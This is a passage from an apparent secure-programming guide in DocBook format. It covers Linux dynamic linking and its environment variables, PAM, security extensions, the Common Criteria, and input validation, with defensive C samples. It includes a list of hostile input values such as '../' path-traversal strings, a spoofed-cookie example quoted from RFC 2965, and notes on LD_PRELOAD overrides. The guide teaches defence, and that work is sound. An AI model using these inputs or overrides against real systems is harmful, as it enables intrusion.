for handling library updates, one reason that Unix and Linux systems are reputed
to be more stable than Windows-based systems.
</para>

<para>
On GNU glibc-based systems, including all Linux systems,
the list of directories automatically searched during program start-up is
stored in the file /etc/ld.so.conf.
Many Red Hat-derived distributions don't normally
include <filename>/usr/local/lib</filename>
in the file <filename>/etc/ld.so.conf</filename>.
I consider this a bug, and adding <filename>/usr/local/lib</filename> to
<filename>/etc/ld.so.conf</filename>
is a common ``fix'' required to run many programs on Red Hat-derived systems.
If you want to just override a few functions in a library, but keep the
rest of the library, you can enter the names of overriding libraries
(shared object files) in <filename>/etc/ld.so.preload</filename>;
these ``preloading'' libraries will take precedence over the standard set.
This preloading file is typically used for emergency patches;
a distribution usually won't include such a file when delivered.
Searching all of these directories at program start-up would be too
time-consuming, so a caching arrangement is actually used.
The program ldconfig(8) by default reads in the file /etc/ld.so.conf,
sets up the appropriate symbolic links in the dynamic link directories
(so they'll follow the standard conventions),
and then writes a cache to /etc/ld.so.cache that's then used by other
programs.
So, ldconfig has to be run whenever a DLL is added, when a DLL is removed,
or when the set of DLL directories changes; running ldconfig is often
one of the steps performed by package managers
when installing a library.
On start-up, then, a program uses the dynamic loader to
read the file /etc/ld.so.cache and then load the libraries it needs.
</para>

<para>
Various environment variables can control this process, and in fact
there are environment variables that permit you to
override this process (so, for example, you can temporarily
substitute a different library for this particular execution).
In Linux,
the environment variable
LD&lowbar;LIBRARY&lowbar;PATH is a colon-separated set of directories where libraries
are searched for first, before the standard set of directories;
this is useful when debugging a new library or using a nonstandard
library for special purposes, but be sure you trust those who can
control those directories.
The variable LD&lowbar;PRELOAD lists shared libraries with functions that override
the standard set, just as /etc/ld.so.preload does.
The variable LD&lowbar;DEBUG displays debugging information; if set
to ``all'', voluminous information about the dynamic linking process
is displayed while it's occurring.
</para>

<para>
Permitting user control over dynamically linked libraries
would be disastrous for setuid/setgid programs if special measures
weren't taken.
Therefore, in the GNU glibc implementation, if the program is setuid or setgid
these variables (and other similar variables) are ignored or greatly
limited in what they can do.
The GNU glibc library determines if a program is setuid or setgid
by checking the program's credentials;
if the UID and EUID differ, or the GID and the EGID differ, the
library presumes the program is setuid/setgid (or descended from one)
and therefore greatly limits its abilities to control linking.
If you examine the GNU glibc source code, you can see this; see especially
the files elf/rtld.c and sysdeps/generic/dl-sysdep.c.
This means that if you cause the UID and GID to equal the EUID and EGID,
and then call a program, these variables will have full effect.
Other Unix-like systems handle the situation differently but for the
same reason: a setuid/setgid program should not be unduly affected
by the environment variables set.
Note that graphical user interface toolkits generally do permit
user control over dynamically linked libraries, because
executables that directly invoke graphical user interface toolkits
should never, ever, be setuid (or have other special privileges) at all.
For more about how to develop secure GUI applications, see
<xref linkend="minimize-privileged-modules">.
</para>
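
<para>
The credential comparison described above can be sketched in a few
lines.
This only illustrates the idea and is not glibc's actual code;
the function name ids&lowbar;differ is hypothetical.
<programlisting>
<![CDATA[
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if the real and effective
   user or group IDs differ (so the process looks
   setuid/setgid), and 0 if they all match. */
int ids_differ(void)
{
  return getuid() != geteuid() || getgid() != getegid();
}
]]>
</programlisting>
Note that this comparison reports 0 once a program has set its real IDs
equal to its effective IDs, which is exactly the situation in which the
environment variables regain their full effect.
</para>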

<para>
For Linux systems, you can get more information from my document, the
<ulink url="http://www.dwheeler.com/program-library"><emphasis>Program Library HOWTO</emphasis></ulink>.
</para>

</sect1>

<sect1 id="audit">
<title>Audit</title>

<para>
Different Unix-like systems handle auditing differently.
In Linux, the most common ``audit'' mechanism is syslogd(8), usually working
in conjunction with klogd(8).
You might also want to look at wtmp(5), utmp(5), lastlog(8), and acct(2).
Some server programs (such as the Apache web server)
also have their own audit trail mechanisms.
According to the FHS, audit logs should be stored in /var/log or its
subdirectories.
</para>

</sect1>

<sect1 id="pam">
<title>PAM</title>

<para>
Sun Solaris and nearly all Linux systems use the
Pluggable Authentication Modules (PAM) system for authentication.
PAM permits run-time configuration of authentication methods
(e.g., use of passwords, smart cards, etc.).
See <xref linkend="use-pam"> for more information on using PAM.
</para>

</sect1>

<sect1 id="unix-extensions">
<title>Specialized Security Extensions for Unix-like Systems</title>

<para>
A vast amount of research and development has gone into
extending Unix-like systems to support security needs of various
communities.
For example, several Unix-like systems have been extended to support the
U.S. military's desire for multilevel security.
If you're developing software, you should try to design your software
so that it can work within these extensions.
</para>

<para>
FreeBSD has a new system call,
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail(2)</ulink>.
The jail system call supports sub-partitioning an environment
into many virtual machines (in a sense, a ``super-chroot'');
its most popular use has been to provide
virtual machine services for Internet Service Provider environments.
Inside a jail, all processes (even those owned by root)
have the scope of their requests limited to the jail.
When a FreeBSD system is booted up after a fresh install,
no processes will be in jail.
When a process is placed in a jail, it and any descendants
it creates will be in that jail.
Once in a jail,
access to the file name-space is restricted in the style of chroot(2)
(with typical chroot escape routes blocked),
the ability to bind network resources is limited to a specific IP address,
the ability to manipulate system resources and perform privileged operations
is sharply curtailed, and the ability to interact with other processes
is limited to only processes inside the same jail.
Note that each jail is bound to a single IP address;
processes within the jail may not make use of any other IP
address for outgoing or incoming connections.
</para>

<para>
Some extensions available in Linux, such as POSIX capabilities and
special mount-time options, have already been discussed.
Here are a few of the other efforts to create
restricted execution environments on Linux systems; there are many different approaches.
The U.S. National Security Agency (NSA) has developed
<ulink url="http://www.nsa.gov/selinux">Security-Enhanced Linux (Flask)</ulink>,
which supports defining a security policy in a specialized language
and then enforces that policy.
The <ulink url="http://medusa.fornax.sk">Medusa DS9</ulink>
extends Linux by supporting, at the kernel level,
a user-space authorization server.
<ulink url="http://www.lids.org">LIDS</ulink>
protects files and processes, allowing administrators to
``lock down'' their system.
The ``Rule Set Based Access Control'' system,
<ulink url="http://www.rsbac.de">RSBAC</ulink>,
is based on the Generalized Framework for Access Control (GFAC)
by Abrams and LaPadula and provides a flexible system of access
control based on several kernel modules.
<ulink url="http://subterfugue.org">Subterfugue</ulink>
is a framework for ``observing and playing with the reality of software'';
it can intercept system calls and change their parameters
and/or change their return values to implement sandboxes, tracers,
and so on;
it runs under Linux 2.4 with no changes (it doesn't require
any kernel modifications).
<ulink url="http://www.cs.berkeley.edu/~daw/janus">Janus</ulink>
is a security tool for sandboxing untrusted applications
within a restricted execution environment.
Some have even used
<ulink url="http://user-mode-linux.sourceforge.net">User-mode Linux</ulink>,
which implements ``Linux on Linux'', as a sandbox implementation.
Because there are so many different approaches to implementing more
sophisticated security models, Linus Torvalds has requested that a
generic approach be developed so different security policies can be
inserted; for more information about this, see
<ulink url="http://mail.wirex.com/mailman/listinfo/linux-security-module">
http://mail.wirex.com/mailman/listinfo/linux-security-module</ulink>.
</para>
<para>
There are many other extensions for security on various Unix-like systems,
but these are really outside the scope of this document.
</para>
</sect1>

</chapter>


<chapter id="requirements">
<title>Security Requirements</title>

<epigraph>
<attribution>Job 5:24 (NIV)</attribution>
<para>
You will know that your tent is secure;
you will take stock of your property and find nothing missing.
</para>
</epigraph>

<para>
Before you can determine if a program is secure, you need to determine
exactly what its security requirements are.
Thankfully, there's an international standard for identifying and defining
security requirements that is useful for many such circumstances:
the Common Criteria [CC 1999], standardized as ISO/IEC 15408:1999.
The CC is the culmination of decades of work to identify
information technology security requirements.
There are other schemes for defining security requirements and evaluating
products to see if products meet the requirements,
such as NIST FIPS-140 for cryptographic equipment,
but these other schemes are generally focused on a
specialized area and won't be considered further here.
</para>

<para>
This chapter briefly describes the Common Criteria (CC) and how to use its
concepts to help you informally identify security requirements and
talk with others about security requirements using standard terminology.
The language of the CC is more precise, but it's also more formal and
harder to understand; hopefully the text in this section will help you
"get the gist".
</para>

<para>
Note that, in some circumstances, software cannot be used unless it
has undergone a CC evaluation by an accredited laboratory.
This includes certain kinds of uses in the U.S. Department of Defense
(as specified by NSTISSP Number 11, which requires that before some
products can be used they must be evaluated or enter evaluation),
and in the future such a requirement may
also include some kinds of uses for software in the U.S. federal government.
This section doesn't provide enough information
if you plan to actually go through a CC evaluation by an
accredited laboratory.
If you plan to go through a formal evaluation,
you need to read the real CC, examine various websites to really understand
the basics of the CC, and
eventually contract a lab accredited to do a CC evaluation.
</para>

<sect1>
<title>Common Criteria Introduction</title>

<para>
First, some general information about the CC will help you understand
how to apply its concepts.
The CC's official name is
"The Common Criteria for Information Technology Security Evaluation",
though it's normally just called the Common Criteria.
The CC document has three parts:
the introduction (that describes the CC overall),
security functional requirements (that lists various kinds of security
functions that products might want to include),
and security assurance requirements (that lists various methods of
assuring that a product is secure).
There is also a related document, the
"Common Evaluation Methodology" (CEM),
that guides evaluators on how to apply the CC when doing formal evaluations
(in particular, it amplifies what the CC means in certain cases).
</para>

<para>
Although the CC is International Standard ISO/IEC 15408:1999,
it is outrageously expensive to order the CC from ISO.
Hopefully someday ISO will follow the lead of other standards
organizations such as the IETF and the W3C, which freely redistribute
standards.
Not surprisingly, IETF and W3C standards are followed more often than
many ISO standards, in part because ISO's fees for standards simply
make them inaccessible to most developers.
(I don't mind authors being paid for their work, but ISO doesn't
fund most of the standards development work - indeed, many of the developers
of ISO documents are volunteers - so ISO's indefensible fees only line their
own pockets and don't actually aid the authors or users at all.)
Thankfully, the CC developers anticipated this problem and have made sure
that the CC's technical content is freely available to all;
you can download the CC's technical content from
<ulink
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>.
Even those doing formal evaluation processes usually
use these editions of the CC, and not the ISO versions;
there's simply no good reason to pay ISO for them.
</para>

<para>
Although it can be used in other ways, the CC is typically
used to create two kinds of documents, a
``Protection Profile'' (PP) or a ``Security Target'' (ST).
A ``protection profile'' (PP) is a document created by a group of users
(for example, a consumer group or large organization)
that identifies the desired security properties of a product.
Basically, a PP is a list of user security requirements,
described in a very specific way defined by the CC.
If you're building a product similar to other existing products, it's
quite possible that there are one or more PPs that define what some
users believe is necessary for that kind of product
(e.g., an operating system or firewall).
A ``security target'' (ST) is a document that identifies what a product
actually does, or a subset of it, that is security-relevant.
An ST doesn't need to meet the requirements of
any particular PP, but an ST could meet the requirements of one or more PPs.
</para>

<para>
Both PPs and STs can go through a formal evaluation.
An evaluation of a PP simply ensures that the PP meets various documentation
rules and sanity checks.
An ST evaluation involves not just examining the ST document,
but more importantly it involves evaluating an actual system
(called the ``target of evaluation'', or TOE).
The purpose of an ST evaluation is to ensure that, to the level of
the assurance requirements specified by the ST,
the actual product (the TOE) meets the ST's security functional requirements.
Customers can then compare evaluated STs to
PPs describing what they want.
Through this comparison, consumers can determine if the
products meet their requirements - and if not, where the limitations are.
</para>

<para>
To create a PP or ST, you go through a process of identifying the
security environment, namely, your
assumptions, threats, and relevant organizational
security policies (if any).
From the security environment, you derive
the security objectives for the product or product type.
Finally, the security requirements are selected so that
they meet the objectives.
There are two kinds of security requirements: functional requirements
(what a product has to be able to do), and assurance requirements
(measures to inspire confidence that the objectives have been met).
Actually creating a PP or ST is often not a simple straight line as
outlined here, but the final result needs to show a clear relationship so
that no critical point is easily overlooked.
Even if you don't plan to write an ST or PP,
the ideas in the CC can still be helpful;
the process of identifying the security environment, objectives, and
requirements is still helpful in identifying what's really important.
</para>

<para>
The vast majority of the CC's text is used to define standardized
functional requirements and assurance requirements.
In essence, the majority of the CC is a ``Chinese menu'' of possible
security requirements that someone might want.
PP authors pick from the various options to describe what they want, and
ST authors pick from the options to describe what they provide.
</para>

<para>
Since many people might have difficulty identifying a reasonable set
of assurance requirements, pre-created sets of assurance requirements
called ``evaluation assurance levels'' (EALs) have been defined, ranging
from 1 to 7.
EAL 2 is simply a standard shorthand for the set of assurance requirements
defined for EAL 2.
Products can add additional assurance measures, for example, they might
choose EAL 2 plus some additional assurance measures (if the combination
isn't enough to achieve a higher EAL level, such a combination would be
called "EAL 2 plus").
There are mutual recognition agreements signed between many of the
world's nations under which each will accept an evaluation done by
an accredited laboratory in the other countries, as long as all of the
assurance measures taken were at the EAL 4 level or less.
</para>

<para>
If you want to actually write an ST or PP, there's an
open source software program that can help you, called the
``CC Toolbox''.
It can make sure that dependencies between requirements
are met, suggest common requirements, and help you quickly
develop a document, but it obviously can't do your thinking for you.
The specification of exactly what information
must be in a PP or ST is in CC part 1, annexes B and C respectively.
</para>

<para>
If you do decide to have your product (or PP) evaluated by
an accredited laboratory, be prepared to spend money, spend time,
and work throughout the process.
In particular, evaluations require paying an
accredited lab to do the evaluation, and higher levels of assurance
become rapidly more expensive.
Simply believing your product is secure isn't good enough; evaluators
will require evidence to justify any claims made.
Thus, evaluations require documentation, and usually the available
documentation has to be improved or developed
to meet CC requirements (especially at the higher assurance levels).
Every claim has to be justified to some level of confidence, so the more
claims made, the stronger the claims, and the
more complicated the design, the more expensive an evaluation is.
Obviously, when flaws are found, they will usually need to be fixed.
Note that a laboratory is paid to evaluate a product and determine the truth.
If the product doesn't meet its claims, then you basically have two
choices: fix the product, or change (reduce) the claims.
</para>

<para>
It's important to discuss with customers what's desired before beginning
a formal ST evaluation;
an ST that includes functional or assurance requirements
not truly needed by customers will
be unnecessarily expensive to evaluate, and an ST that omits
necessary requirements may not be acceptable to the customers
(because that necessary piece won't have been evaluated).
PPs identify such requirements, but make sure that the PP
accurately reflects the customer's real requirements (perhaps the customer
only wants a part of the functionality or assurance in the PP,
or has a different environment in mind, or wants something else instead
for the situations where your product will be used).
Note that an ST need not include every security feature in a product;
an ST only states what will be (or has been) evaluated.
A product that has a higher EAL rating is not necessarily more secure than a
similar product with a lower rating or no rating;
the environment might be different, the evaluation may have saved money and
time by not evaluating the other product at a higher level,
or perhaps the evaluation missed something important.
Evaluations are not proofs; they simply impose a defined minimum bar to
gain confidence in the requirements or product.
</para>

</sect1>

<sect1>
<title>Security Environment and Objectives</title>

<para>
The first step in defining a PP or ST is to identify the
``security environment''.
This means that you have to consider the physical environment
(can attackers access the computer hardware?),
the assets requiring protection (files, databases, authorization
credentials, and so on),
and the purpose of the TOE (what kind of product is it? what is
the intended use?).
</para>

<para>
In developing a PP or ST, you'd end up with a statement of
assumptions (who is trusted? is the network or platform benign?),
threats (that the system or its environment must counter),
and organizational security policies (that the system or its environment
must meet).
A threat is characterized in terms of a threat agent
(who might perform the attack?), a presumed attack method,
any vulnerabilities that are the basis for the attack, and what asset
is under attack.
</para>

<para>
You'd then define a set of security objectives for the system
and environment, and show that those objectives counter the threats
and satisfy the policies.
Even if you aren't creating a PP or ST, thinking about your assumptions,
threats, and possible policies can help you avoid foolish decisions.
For example, if the computer network you're using can be sniffed
(e.g., the Internet), then unencrypted passwords are a foolish idea
in most circumstances.
</para>

<para>
For the CC, you'd then identify the functional and assurance requirements
that would be met by the TOE, and which ones would be met by the environment,
to meet those security objectives.
These requirements would be selected from the ``Chinese menu'' of the CC's
possible requirements, and the next sections will briefly describe
the major classes of requirements.
In the CC, requirements are grouped into classes, which are subdivided into
families, which are further subdivided into components; see the CC itself
if you need the details.
A good diagram showing how this works is in the CC part 1, figure 4.5,
which I cannot reproduce here.
</para>

<para>
Again, if you're not intending for your product to undergo a CC evaluation,
it's still good to briefly determine this kind of information and informally
include that information
in your documentation (e.g., the man page or whatever your documentation is).
</para>

</sect1>

<sect1>
<title>Security Functionality Requirements</title>
<para>
This section briefly describes the CC security functionality requirements
(by CC class),
primarily to give you an idea of the kinds of security requirements
you might want in your software.
If you want more detail about the CC's requirements, see CC part 2.
Here are the major classes of CC security requirements, along with
the 3-letter CC abbreviation for that class:
<itemizedlist>
<listitem><para>
Security Audit (FAU).
Perhaps you'll need to recognize, record, store, and analyze
security-relevant activities.
You'll need to identify what you want to make auditable, since
often you can't leave all possible auditing capabilities enabled.
Also, consider what to do when there's no room left for auditing -
if you stop the system, an attacker may intentionally do things to be logged
and thus stop the system.
</para></listitem>
<listitem><para>
Communication/Non-repudiation (FCO).
This class is poorly named in the CC; officially it's called
communication, but the real meaning is non-repudiation.
Is it important that an originator cannot deny having sent a message, or
that a recipient cannot deny having received it?
There are limits to how well technology itself can support
non-repudiation (e.g., a user might be able to give their private key away
ahead of time if they wanted to be able to repudiate something later),
but nevertheless for some applications supporting non-repudiation
capabilities is very useful.
</para></listitem>
<listitem><para>
Cryptographic Support (FCS).
If you're using cryptography, what operations use cryptography,
what algorithms and key sizes are you using, and how are you managing
their keys (including distribution and destruction)?
</para></listitem>
<listitem><para>
User Data Protection (FDP).
This class specifies requirements for protecting user data, and is a big
class in the CC with many families inside it.
The basic idea is that you should specify a policy for data
(access control or information flow rules),
develop various means to implement the policy,
possibly support off-line storage, import, and export, and
provide integrity when transferring user data between TOEs.
One often-forgotten issue is residual information protection - is it
acceptable if an attacker can later recover ``deleted'' data?
</para></listitem>
<listitem><para>
Identification and authentication (FIA).
Generally you don't just want a user to report who they are
(identification) - you need to verify their identity, a process
called authentication.
Passwords are the most common mechanism for authentication.
It's often useful to limit the number of authentication attempts
(if you can) and limit the feedback during authentication
(e.g., displaying asterisks instead of the actual password).
Certainly, limit what a user can do before authenticating; in many cases,
don't let the user do anything without authenticating.
There may be many issues controlling when a session can start, but in the CC
world this is handled by the "TOE access" (FTA) class described below instead.
</para></listitem>
<listitem><para>
Security Management (FMT).
Many systems will require some sort of management (e.g., to
control who can do what), generally by those who are given a more
trusted role (e.g., administrator).
Be sure you think through what those special operations are, and ensure that
only those with the trusted roles can invoke them.
You want to limit trust; ideally, even more trusted roles should be limited
in what they can do.
</para></listitem>
<listitem><para>
Privacy (FPR).
Do you need to support anonymity, pseudonymity, unlinkability,
or unobservability?
If so, are there conditions where you want or don't want these
(e.g., should an administrator be able to determine the real identity
of someone hiding behind a pseudonym?).
Note that these can seriously conflict with
non-repudiation, if you want those too.
If you're worried about sophisticated threats, these functions
can be hard to provide.
</para></listitem>
<listitem><para>
Protection of the TOE Security Functions/Self-protection (FPT).
Clearly, if the TOE can be subverted, any security functions it provides
aren't worthwhile, and in many cases a TOE has to provide at least some
self-protection.
Perhaps you should "test the underlying abstract machine" - i.e., test
that the underlying components meet your assumptions,
or have the product run self-tests
(say during start-up, periodically, or on request).
You should probably "fail secure", at least under certain conditions;
determine what those conditions are.
Consider physical protection of the TOE.
You may want some sort of secure recovery function after a failure.
It's often useful to have replay detection (detect when an attacker is
trying to replay older actions) and counter it.
Usually a TOE must make sure that any access checks are
always invoked and actually succeed before performing a restricted action.
</para></listitem>
<listitem><para>
Resource Utilization (FRU).
Perhaps you need to provide fault tolerance,
a priority of service scheme, or support
resource allocation (such as a quota system).
</para></listitem>
<listitem><para>
TOE Access (FTA).
There may be many issues controlling sessions.
Perhaps there should be a limit on the number of concurrent sessions
(if you're running a web service, would it make sense for the same user
to be logged in simultaneously, or from two different machines?).
Perhaps you should lock or terminate a session automatically
(e.g., after a timeout), or let users initiate a session lock.
You might want to include a standard warning banner.
One surprisingly useful piece of information is displaying, on login,
information about the last session (e.g., the date/time and location of the
last login) and the date/time of the
last unsuccessful attempt - this gives users information
that can help them detect interlopers.
Perhaps sessions can only be established based on other criteria
(e.g., perhaps you can only use the program during business hours).
</para></listitem>
<listitem><para>
Trusted path/channels (FTP).
A common trick used by attackers is to make the screen appear to be
something it isn't, e.g., run an ordinary program that looks like a
login screen or a forged web site.
Thus, perhaps there needs to be a "trusted path" - a way that users
can ensure that they are talking to the "real" program.
</para></listitem>
</itemizedlist>


</para>
</sect1>

<sect1>
<title>Security Assurance Measure Requirements</title>
<para>
As noted above, the CC has a set of possible assurance requirements that
can be selected, and several predefined sets of assurance requirements
(EAL levels 1 through 7).
Again, if you're actually going to go through a CC evaluation, you
should examine the CC documents; I'll skip describing the measures
involving reviewing official CC documents (evaluating PPs and STs).
Here are some assurance measures that can increase the confidence
others have in your software:
<itemizedlist>
<listitem><para>
Configuration management (ACM).
At least, have a unique version identifier for each TOE release, so that
users will know what they have.
You gain more assurance if you have good automated tools to control
your software, and have separate version identifiers for each piece
(typical CM tools like CVS can do this, although CVS's failure to record
changes as atomic changes is a weakness).
The more that's under configuration management, the better;
don't just control your code, but also control documentation
and all development tools,
and track all problem reports (especially security-related ones).
</para></listitem>
<listitem><para>
Delivery and operation (ADO).
Your delivery mechanism should ideally let users detect unauthorized
modifications to prevent someone else masquerading as the developer, and
even better, prevent modification in the first place.
You should provide documentation on how to securely install, generate,
and start up the TOE, possibly generating a log describing how the TOE
was generated.
</para></listitem>
<listitem><para>
Development (ADV).
These CC requirements deal with documentation describing the TOE
implementation, and require that the documents be consistent with each other
(e.g., the information in the ST, functional specification, high-level
design, low-level design, and code, as well as any models of the
security policy).
</para></listitem>
<listitem><para>
Guidance documents (AGD).
Users and administrators of your product will probably need some
sort of guidance to help them use it correctly.
It doesn't need to be on paper; on-line help and "wizards" can help too.
The guidance should include warnings about actions that may be
a problem in a secure environment, and describe how to use the system
securely.
</para></listitem>
<listitem><para>
Life-cycle support (ALC).
This includes development security (securing the systems being used
for development, including physical security),
a flaw remediation process (to track and correct all security flaws),
and selecting development tools wisely.
</para></listitem>
<listitem><para>
Tests (ATE).
Simply testing can help, but remember that you need to test the
security functions and not just general functions.
You should check that if something is set to be permitted, it's permitted, and
that if it's set to be forbidden, it is no longer permitted.
Of course, there may be clever ways to subvert this, which is what
vulnerability assessment is all about (described next).
</para></listitem>
<listitem><para>
Vulnerability Assessment (AVA).
Doing a vulnerability analysis is useful, where
someone pretends to be an attacker and tries to find vulnerabilities
in the product using the available information, including documentation
(look for "don't do X" statements and see if an attacker could exploit them)
and publicly known past vulnerabilities of this or similar products.
This book describes ways of countering known vulnerabilities of
previous products, such as replay attacks (where known-good
information is stored and retransmitted), buffer overflow attacks,
race conditions, and other issues.
The user and administrator guidance documents should be examined to
ensure that misleading, unreasonable, or conflicting guidance is
removed, and that security procedures for all modes of operation
have been addressed.
Specialized systems may need to worry about covert channels;
read the CC if you wish to learn more about covert channels.
</para></listitem>
<listitem><para>
Maintenance of assurance (AMA).
If you're not going through a CC evaluation, you don't need a formal
AMA process, but all software undergoes change.
What is your process to give all your users strong confidence that future
changes to your software will not create new vulnerabilities?
For example, you could
establish a process where multiple people review any proposed changes.
</para></listitem>
</itemizedlist>
</para>
</sect1>
</chapter>

<chapter id="input">
<title>Validate All Input</title>

<epigraph>
<attribution>Proverbs 2:12 (NIV)</attribution>
<para>
Wisdom will save you from the ways of wicked men,
from men whose words are perverse...
</para>
</epigraph>

<para>
Some inputs are from untrusted users, so those inputs must be validated
(filtered) before being used.
You should determine what is legal and reject anything that does
not match that definition.
Do not do the reverse (identify what is illegal and write code to
reject those cases),
because you are likely to forget to handle an important case of illegal input.
</para>

<para>
There is a good reason for identifying ``illegal'' values, though, and that's
as a set of tests (usually just executed in your head)
to be sure that your validation code is thorough.
When I set up an input filter,
I mentally attack the filter to see if there are
illegal values that could get through.
Depending on the input, here are a few examples of common ``illegal'' values
that your input filters may need to prevent:
the empty string,
".", "..", "../", anything starting with "/" or ".",
anything with "/" or "&amp;" inside it, any control characters (especially NIL
and newline), and/or
any characters with the ``high bit'' set (especially
values decimal 254 and 255, and character 133, the Unicode Next Line (NEL)
character used by OS/390).
Again, your code should not be checking for ``bad'' values; you should do
this check mentally to be sure that your pattern ruthlessly limits input
values to legal values.
If your pattern isn't sufficiently narrow, you need to carefully
re-examine the pattern to see if there are other problems.
</para>

<para>
Limit the maximum character length (and minimum length if appropriate),
and be sure to not lose control when such lengths are exceeded
(see <xref linkend="buffer-overflow"> for more about buffer overflows).
</para>
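
<para>
As a minimal sketch of the ``define what is legal'' approach,
the following C function accepts only strings that match a narrow pattern
and a maximum length, and rejects everything else.
The policy itself (1 to 32 characters, a lowercase letter first, then
lowercase letters, digits, or underscores) and the names MAX_NAME_LEN and
is_legal_name() are assumptions made up for this illustration;
substitute whatever is actually legal for your data.
</para>
<programlisting><![CDATA[
#include <stddef.h>
#include <string.h>

/* Hypothetical policy, for illustration only. */
#define MAX_NAME_LEN 32

static const char FIRST_CHARS[] = "abcdefghijklmnopqrstuvwxyz";
static const char OTHER_CHARS[] = "abcdefghijklmnopqrstuvwxyz0123456789_";

/* Returns 1 if name is legal under the policy above, 0 otherwise. */
int is_legal_name(const char *name)
{
    size_t len;

    if (name == NULL)
        return 0;
    for (len = 0; name[len] != '\0'; len++) {
        /* Give up as soon as the limit is exceeded, without
           scanning the rest of an overlong input. */
        if (len >= MAX_NAME_LEN)
            return 0;
        /* Accept a character only if it is on the list of legal ones. */
        if (strchr(len == 0 ? FIRST_CHARS : OTHER_CHARS, name[len]) == NULL)
            return 0;
    }
    return len > 0;     /* the empty string is not legal either */
}
]]></programlisting>
<para>
Note that the function never lists ``bad'' characters;
values such as "../etc/passwd" or a name with an embedded newline fail
simply because they contain something that is not on the legal list.
</para>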

<para>
Here are a few common data types, and things you should validate
before using them from an untrusted user:
<itemizedlist>
<listitem><para>
For strings, identify the legal characters or legal patterns
(e.g., as a regular expression) and reject anything not matching that form.
There are special problems when strings contain control characters
(especially linefeed or NIL) or metacharacters (especially shell
metacharacters); it is often
best to ``escape'' such metacharacters immediately when the input is received so
that such characters are not accidentally sent.
CERT goes further and recommends escaping all characters
that aren't in a list of characters not needing escaping [CERT 1998, CMU 1998].
See <xref linkend="handle-metacharacters">
for more information on metacharacters.
Note that
<ulink url="http://www.w3.org/TR/2001/NOTE-newline-20010314">
line ending encodings vary on different computers</ulink>:
Unix-based systems use character 0x0a (linefeed),
CP/M and DOS based systems (including Windows) use 0x0d 0x0a
(carriage-return linefeed, and some programs incorrectly reverse the order),
the Apple MacOS uses 0x0d (carriage return), and IBM OS/390 uses
0x85 (next line, sometimes called newline).
</para></listitem>

<listitem><para>
Limit all numbers to the minimum (often zero) and maximum allowed values.
</para></listitem>

<listitem><para>
A full email address checker is actually quite complicated, because there
are legacy formats that greatly complicate validation if you need
to support all of them; see mailaddr(7) and IETF RFC 822 [RFC 822]
for more information if such checking is necessary.
Friedl [1997] developed a regular expression to check if
an email address is valid (according to the specification);
his ``short'' regular expression is 4,724 characters,
and his ``optimized'' expression (in appendix B) is 6,598 characters long.
And even that regular expression isn't perfect; it can't recognize local
email addresses, and it can't handle nested parentheses in comments
(as the specification permits).
Often you can simplify and only permit the ``common'' Internet
address formats.
</para></listitem>

<listitem><para>
Filenames should be checked; see
<xref linkend="file-names"> for more information on filenames.
</para></listitem>

<listitem><para>
URIs (including URLs) should be checked for validity.
If you are directly acting on a URI (i.e., you're implementing a web
server or web-server-like program and the URL is a request for your data),
make sure the URI is valid, and be especially careful of URIs that
try to ``escape'' the document root (the area of the filesystem
that the server is responding to).
The most common ways to escape the document root are via ``..'' or
a symbolic link, so most servers check any ``..'' directories themselves
and ignore symbolic links unless specially directed.
Also remember to decode any encoding first (via URL encoding or
UTF-8 encoding), or an encoded ``..'' could slip through.
URIs aren't supposed to even include UTF-8 encoding, so the safest thing
is to reject any URIs that include characters with high bits set.
</para>
<para>
If you are implementing a system that uses the URI/URL as data,
you're not home-free at all; you need to ensure that malicious users
can't insert URIs that will harm other users.
See <xref linkend="Validating-uris">
for more information about this.
</para></listitem>

<listitem><para>
When accepting cookie values, make sure that the domain value
for any cookie you're using
is the expected one.  Otherwise, a (possibly cracked) related site
might be able to insert spoofed cookies.
Here's an example from IETF RFC 2965 of how failing to do this check could
cause a problem:
<itemizedlist>
<listitem><para>
         User agent makes request to victim.cracker.edu, gets back
         cookie session_id="1234" and sets the default domain
         victim.cracker.edu.
</para></listitem>
<listitem><para>
         User agent makes request to spoof.cracker.edu, gets back cookie
         session_id="1111", with Domain=".cracker.edu".
</para></listitem>
<listitem><para>
         User agent makes request to victim.cracker.edu again, and passes:
<programlisting>
         Cookie: $Version="1"; session_id="1234",
                 $Version="1"; session_id="1111"; $Domain=".cracker.edu"
</programlisting>
         The server at victim.cracker.edu should detect that the second
         cookie was not one it originated by noticing that the Domain
         attribute is not for itself and ignore it.
</para></listitem>
</itemizedlist>
</para></listitem>
</itemizedlist>
</para>
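
<para>
For the numeric case in the list above, here is one possible sketch in C.
It uses the standard strtol(3) routine, and succeeds only if the entire
string is a decimal number within the permitted range.
The function name parse_bounded_long() is invented for this example.
</para>
<programlisting><![CDATA[
#include <errno.h>
#include <stdlib.h>

/* Parses text as a decimal integer and stores it in *result only if the
   whole string is a number within [min, max].
   Returns 1 on success and 0 on any failure. */
int parse_bounded_long(const char *text, long min, long max, long *result)
{
    char *end;
    long value;

    if (text == NULL || result == NULL)
        return 0;
    /* strtol() would silently skip leading whitespace and accept a '+';
       insist that the input starts with a digit or a minus sign. */
    if (!((*text >= '0' && *text <= '9') || *text == '-'))
        return 0;
    errno = 0;
    value = strtol(text, &end, 10);
    if (errno == ERANGE)
        return 0;               /* does not fit in a long */
    if (end == text || *end != '\0')
        return 0;               /* no digits, or trailing junk */
    if (value < min || value > max)
        return 0;               /* outside the permitted range */
    *result = value;
    return 1;
}
]]></programlisting>
<para>
A caller would typically treat a zero return as a reason to reject the
whole request, rather than substituting a default value.
</para>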


<para>
Unless you account for them,
the legal character patterns must not include characters
or character sequences that have special meaning to either
the program internals or the eventual output:
<itemizedlist>
<listitem><para>
A character sequence may have special meaning to the program's internal
storage format.
For example, if you store data (internally or externally) in delimited
strings, make sure that the delimiters are not permitted data values.
A number of programs
store data in comma (,) or colon (:) delimited text files;
inserting the delimiters
in the input can be a problem unless the program accounts for it (i.e.,
by preventing it or encoding it in some way).
Other characters often causing these problems include single and double quotes
(used for surrounding strings)
and the less-than sign "&lt;"
(used in SGML, XML, and HTML to indicate a tag's beginning; this is important
if you store data in these formats).
Most data formats have an escape sequence to handle these cases; use it,
or filter such data on input.
</para></listitem>
<listitem><para>
A character sequence may have special meaning if sent back out to a user.
A common example of this is permitting HTML tags in data input that will later
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
However, the problem is much more general.
